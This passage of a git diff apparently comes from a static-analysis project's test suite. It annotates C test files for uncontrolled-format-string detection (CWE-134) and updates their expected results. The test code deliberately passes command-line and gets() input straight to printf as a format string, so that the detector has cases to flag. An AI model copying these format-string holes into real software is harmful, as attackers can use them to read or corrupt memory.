vulnerability */ - fprintf(stdout, data); + fprintf(stdout, data); // $ Alert } /* goodG2B uses the GoodSource with the BadSink */ diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.c b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.c index 5649c0e19b1c..4c6baf0d562e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.c @@ -10,7 +10,7 @@ void printWrapper(char *correct) { printf(correct); } -int main(int argc, char **argv) { +int main(int argc, char **argv) { // $ Source // GOOD: constant format printf("Correct"); printWrapper("Correct"); @@ -92,63 +92,63 @@ int main(int argc, char **argv) { printWrapper((char *) c10); // BAD: format comes from argv - printf(argv[1]); - printWrapper(argv[1]); + printf(argv[1]); // $ Alert + printWrapper(argv[1]); // $ Alert // BAD: i1 value comes from argv char *i1; i1 = argv[1]; - printf(i1); - printWrapper(i1); + printf(i1); // $ Alert + printWrapper(i1); // $ Alert // BAD: i2 value comes from argv char **i2 = argv; - printf(i2[0]); - printWrapper(i2[0]); + printf(i2[0]); // $ Alert + printWrapper(i2[0]); // $ Alert // BAD: i2 value comes from argv - printf(*i2); - printWrapper(*i2); + printf(*i2); // $ Alert + printWrapper(*i2); // $ Alert // BAD: i3 value comes from argv char i3[5012]; memcpy(i3, argv[1], 5012); - printf(i3); - printWrapper(i3); + printf(i3); // $ Alert + printWrapper(i3); // $ Alert // BAD: i4 value comes from argv char *i4 = i3; - printf(i4); - printWrapper(i4); + printf(i4); // $ Alert + printWrapper(i4); // $ Alert // BAD: i5 value comes from argv char i5[5012]; i5[0] = argv[1][0]; - printf(i5); - printWrapper(i5); + printf(i5); // $ Alert + printWrapper(i5); // $ Alert // BAD: i5 value comes from argv - printf(i5 + 1); - printWrapper(i5 + 1); + printf(i5 + 1); // $ Alert + printWrapper(i5 + 1); // $ Alert // BAD: i4 value comes from argv - printf(i4++); - printWrapper(--i4); + printf(i4++); // $ Alert + printWrapper(--i4); // $ Alert // BAD: i5 value comes from argv, so in some cases the format come from argv - printf(argv[1] ? "a" : i5); - printWrapper(argv[1] ? "a" : i5); + printf(argv[1] ? "a" : i5); // $ Alert + printWrapper(argv[1] ? "a" : i5); // $ Alert // BAD: i7 receives the value of i1, which comes from argv char *i7 = (argv[1] , i1); - printf(i7); - printWrapper(i7); + printf(i7); // $ Alert + printWrapper(i7); // $ Alert // BAD: i8 value comes from argv char *i8; *(&i8) = argv[1]; - printf(i8); - printWrapper(i8); + printf(i8); // $ Alert + printWrapper(i8); // $ Alert // BAD: i9 value comes from argv [NOT DETECTED] char i9buf[32]; diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.expected index 7b87c3ff440a..ca7aa17cf086 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.expected @@ -1,3 +1,28 @@ +#select +| argvLocal.c:95:9:95:15 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:95:9:95:15 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:96:15:96:21 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:96:15:96:21 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:101:9:101:10 | *i1 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:101:9:101:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:102:15:102:16 | *i1 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:102:15:102:16 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:106:9:106:13 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:106:9:106:13 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:107:15:107:19 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:107:15:107:19 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:110:9:110:11 | ** ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:110:9:110:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:111:15:111:17 | ** ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:111:15:111:17 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:116:9:116:10 | *i3 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:116:9:116:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:117:15:117:16 | *i3 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:117:15:117:16 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:121:9:121:10 | *i4 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:121:9:121:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:122:15:122:16 | *i4 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:122:15:122:16 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:127:9:127:10 | *i5 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:127:9:127:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:128:15:128:16 | *i5 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:128:15:128:16 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:131:9:131:14 | *... + ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:131:9:131:14 | *... + ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:132:15:132:20 | *... + ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:132:15:132:20 | *... + ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:135:9:135:12 | *... ++ | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:135:9:135:12 | *... ++ | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:136:15:136:18 | *-- ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:136:15:136:18 | *-- ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:139:9:139:26 | *... ? ... : ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:139:9:139:26 | *... ? ... : ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:140:15:140:32 | *... ? ... : ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:140:15:140:32 | *... ? ... : ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:144:9:144:10 | *i7 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:144:9:144:10 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:145:15:145:16 | *i7 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:145:15:145:16 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:150:9:150:10 | *i8 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:150:9:150:10 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:151:15:151:16 | *i8 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:151:15:151:16 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | edges | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:9:25:9:31 | *correct | provenance | | | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:95:9:95:15 | *access to array | provenance | | @@ -132,28 +157,3 @@ subpaths | argvLocal.c:122:15:122:16 | *i4 | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:122:15:122:16 | printWrapper output argument | | argvLocal.c:128:15:128:16 | *i5 | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:128:15:128:16 | printWrapper output argument | | argvLocal.c:132:15:132:20 | *... + ... | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:132:15:132:20 | printWrapper output argument | -#select -| argvLocal.c:95:9:95:15 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:95:9:95:15 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:96:15:96:21 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:96:15:96:21 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:101:9:101:10 | *i1 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:101:9:101:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:102:15:102:16 | *i1 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:102:15:102:16 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:106:9:106:13 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:106:9:106:13 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:107:15:107:19 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:107:15:107:19 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:110:9:110:11 | ** ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:110:9:110:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:111:15:111:17 | ** ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:111:15:111:17 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:116:9:116:10 | *i3 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:116:9:116:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:117:15:117:16 | *i3 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:117:15:117:16 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:121:9:121:10 | *i4 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:121:9:121:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:122:15:122:16 | *i4 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:122:15:122:16 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:127:9:127:10 | *i5 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:127:9:127:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:128:15:128:16 | *i5 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:128:15:128:16 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:131:9:131:14 | *... + ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:131:9:131:14 | *... + ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:132:15:132:20 | *... + ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:132:15:132:20 | *... + ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:135:9:135:12 | *... ++ | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:135:9:135:12 | *... ++ | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:136:15:136:18 | *-- ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:136:15:136:18 | *-- ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:139:9:139:26 | *... ? ... : ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:139:9:139:26 | *... ? ... : ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:140:15:140:32 | *... ? ... : ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:140:15:140:32 | *... ? ... : ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:144:9:144:10 | *i7 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:144:9:144:10 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:145:15:145:16 | *i7 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:145:15:145:16 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:150:9:150:10 | *i8 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:150:9:150:10 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:151:15:151:16 | *i8 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:151:15:151:16 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.qlref index 079e0c8a7c0e..9c363bfac55e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-134/UncontrolledFormatString.ql \ No newline at end of file +query: Security/CWE/CWE-134/UncontrolledFormatString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.expected index b5f6ad602fb8..e853d5457f65 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.expected @@ -1,3 +1,27 @@ +#select +| consts.cpp:86:9:86:10 | *v1 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:86:9:86:10 | *v1 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:86:2:86:7 | call to printf | printf | +| consts.cpp:91:9:91:10 | *v2 | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:91:9:91:10 | *v2 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:91:2:91:7 | call to printf | printf | +| consts.cpp:95:9:95:10 | *v3 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:95:9:95:10 | *v3 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:95:2:95:7 | call to printf | printf | +| consts.cpp:95:9:95:10 | *v3 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:95:9:95:10 | *v3 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:95:2:95:7 | call to printf | printf | +| consts.cpp:100:9:100:10 | *v4 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:100:9:100:10 | *v4 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:100:2:100:7 | call to printf | printf | +| consts.cpp:100:9:100:10 | *v4 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:100:9:100:10 | *v4 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:100:2:100:7 | call to printf | printf | +| consts.cpp:103:9:103:17 | *call to varFunc | consts.cpp:103:9:103:17 | *call to varFunc | consts.cpp:103:9:103:17 | *call to varFunc | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:103:2:103:7 | call to printf | printf | +| consts.cpp:107:9:107:10 | *v5 | consts.cpp:106:13:106:19 | *call to varFunc | consts.cpp:107:9:107:10 | *v5 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:107:2:107:7 | call to printf | printf | +| consts.cpp:112:9:112:10 | *v6 | consts.cpp:111:7:111:13 | *call to varFunc | consts.cpp:112:9:112:10 | *v6 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:112:2:112:7 | call to printf | printf | +| consts.cpp:116:9:116:13 | *access to array | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | +| consts.cpp:116:9:116:13 | *access to array | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | +| consts.cpp:116:9:116:13 | *access to array | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | +| consts.cpp:121:9:121:10 | *v8 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | +| consts.cpp:121:9:121:10 | *v8 | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | +| consts.cpp:121:9:121:10 | *v8 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | +| consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:126:2:126:7 | call to printf | printf | +| consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:126:2:126:7 | call to printf | printf | +| consts.cpp:130:9:130:10 | *v9 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:130:9:130:10 | *v9 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:130:2:130:7 | call to printf | printf | +| consts.cpp:130:9:130:10 | *v9 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:130:9:130:10 | *v9 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:130:2:130:7 | call to printf | printf | +| consts.cpp:135:9:135:11 | *v10 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:135:9:135:11 | *v10 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:135:2:135:7 | call to printf | printf | +| consts.cpp:135:9:135:11 | *v10 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:135:9:135:11 | *v10 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:135:2:135:7 | call to printf | printf | +| consts.cpp:140:9:140:11 | *v11 | consts.cpp:139:13:139:16 | readString output argument | consts.cpp:140:9:140:11 | *v11 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:140:2:140:7 | call to printf | printf | +| consts.cpp:145:9:145:11 | *v12 | consts.cpp:144:16:144:18 | readStringRef output argument | consts.cpp:145:9:145:11 | *v12 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:145:2:145:7 | call to printf | printf | edges | consts.cpp:24:7:24:9 | **gv1 | consts.cpp:30:9:30:14 | *access to array | provenance | | | consts.cpp:24:7:24:9 | **gv1 | consts.cpp:123:2:123:12 | *... = ... | provenance | | @@ -69,27 +93,3 @@ nodes | consts.cpp:144:16:144:18 | readStringRef output argument | semmle.label | readStringRef output argument | | consts.cpp:145:9:145:11 | *v12 | semmle.label | *v12 | subpaths -#select -| consts.cpp:86:9:86:10 | *v1 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:86:9:86:10 | *v1 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:86:2:86:7 | call to printf | printf | -| consts.cpp:91:9:91:10 | *v2 | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:91:9:91:10 | *v2 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:91:2:91:7 | call to printf | printf | -| consts.cpp:95:9:95:10 | *v3 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:95:9:95:10 | *v3 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:95:2:95:7 | call to printf | printf | -| consts.cpp:95:9:95:10 | *v3 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:95:9:95:10 | *v3 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:95:2:95:7 | call to printf | printf | -| consts.cpp:100:9:100:10 | *v4 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:100:9:100:10 | *v4 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:100:2:100:7 | call to printf | printf | -| consts.cpp:100:9:100:10 | *v4 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:100:9:100:10 | *v4 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:100:2:100:7 | call to printf | printf | -| consts.cpp:103:9:103:17 | *call to varFunc | consts.cpp:103:9:103:17 | *call to varFunc | consts.cpp:103:9:103:17 | *call to varFunc | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:103:2:103:7 | call to printf | printf | -| consts.cpp:107:9:107:10 | *v5 | consts.cpp:106:13:106:19 | *call to varFunc | consts.cpp:107:9:107:10 | *v5 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:107:2:107:7 | call to printf | printf | -| consts.cpp:112:9:112:10 | *v6 | consts.cpp:111:7:111:13 | *call to varFunc | consts.cpp:112:9:112:10 | *v6 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:112:2:112:7 | call to printf | printf | -| consts.cpp:116:9:116:13 | *access to array | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | -| consts.cpp:116:9:116:13 | *access to array | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | -| consts.cpp:116:9:116:13 | *access to array | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | -| consts.cpp:121:9:121:10 | *v8 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | -| consts.cpp:121:9:121:10 | *v8 | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | -| consts.cpp:121:9:121:10 | *v8 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | -| consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:126:2:126:7 | call to printf | printf | -| consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:126:2:126:7 | call to printf | printf | -| consts.cpp:130:9:130:10 | *v9 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:130:9:130:10 | *v9 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:130:2:130:7 | call to printf | printf | -| consts.cpp:130:9:130:10 | *v9 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:130:9:130:10 | *v9 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:130:2:130:7 | call to printf | printf | -| consts.cpp:135:9:135:11 | *v10 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:135:9:135:11 | *v10 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:135:2:135:7 | call to printf | printf | -| consts.cpp:135:9:135:11 | *v10 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:135:9:135:11 | *v10 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:135:2:135:7 | call to printf | printf | -| consts.cpp:140:9:140:11 | *v11 | consts.cpp:139:13:139:16 | readString output argument | consts.cpp:140:9:140:11 | *v11 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:140:2:140:7 | call to printf | printf | -| consts.cpp:145:9:145:11 | *v12 | consts.cpp:144:16:144:18 | readStringRef output argument | consts.cpp:145:9:145:11 | *v12 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:145:2:145:7 | call to printf | printf | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.qlref index 83622f12b4d9..cb71273232ca 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/NonConstantFormat.ql \ No newline at end of file +query: Likely Bugs/Format/NonConstantFormat.ql +postprocess: 